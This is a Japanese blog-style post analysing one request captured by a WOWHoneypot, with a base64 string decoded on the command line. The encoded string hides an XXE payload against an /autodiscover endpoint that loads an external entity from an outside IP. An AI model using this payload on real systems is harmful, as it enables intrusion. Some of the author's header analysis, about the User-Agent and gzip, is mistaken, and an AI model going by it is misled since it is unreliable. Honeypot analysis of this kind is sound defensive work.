アクセスログはbase64でエンコードされている部分がWOWHoneypotのアクセスログにあります。
この文字列をデコードしてあげると、どんなコマンドを仕掛けているかわかります。
1日数十から多い時は数百のアクセスがくるので全てにデコードして分析は非現実的ですので、例として一つのコマンドを見てみます。
~$ echo "UE9TVCAvYXV0b2Rpc2NvdmVyIEhUVFAvMS4xCkhvc3Q6IDEzMy4yNDIuMTc4LjQwOjgwClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS83OC4wLjM5MDQuMTA4IFNhZmFyaS81MzcuMzYKQ29ubmVjdGlvbjogY2xvc2UKQ29udGVudC1MZW5ndGg6IDI2NApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKCjwhRE9DVFlQRSBwcmtwZWRkciBbPCFFTEVNRU5UIHBya3BlZGRyIEFOWT48IUVOVElUWSAlIG5hc2t6b2J3IFNZU1RFTSAnaHR0cDovLzgyLjExNy4yNTIuODMva2sueG1sJz4lbmFza3pvYnc7XT48QXV0b2Rpc2NvdmVyPjxSZXF1ZXN0PjxFTWFpbEFkZHJlc3M+YXNhc2RAbWFpbC5jb208L0VNYWlsQWRkcmVzcz48QWNjZXB0YWJsZVJlc3BvbnNlU2NoZW1hPiZ3b2NhcTs8L0FjY2VwdGFibGVSZXNwb25zZVNjaGVtYT48L1JlcXVlc3Q+PC9BdXRvZGlzY292ZXI+Cg==" | base64 -d
結果
POST /autodiscover HTTP/1.1
Host: XXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
POSTはHTTPサービスへの攻撃で用いられます。
User-Agentを見ると、OS情報とかブラウザ情報が書いてあります。
しかし、Windows NT10.0でAppleWebKit、Chrome、Safariとめちゃくちゃですねwww
Accept-Encoding:gzipは圧縮アルゴリズムでファイルを送りつけようとしたのでしょうか?
相手がgzipに対応していないと解凍できないので意味がないのですが、解答と圧縮に負荷がかかるのでちょっとした嫌がらせ感もありますね。[1]
他にも興味深い攻撃などあったら引き続きレポートしていきます。
参考文献
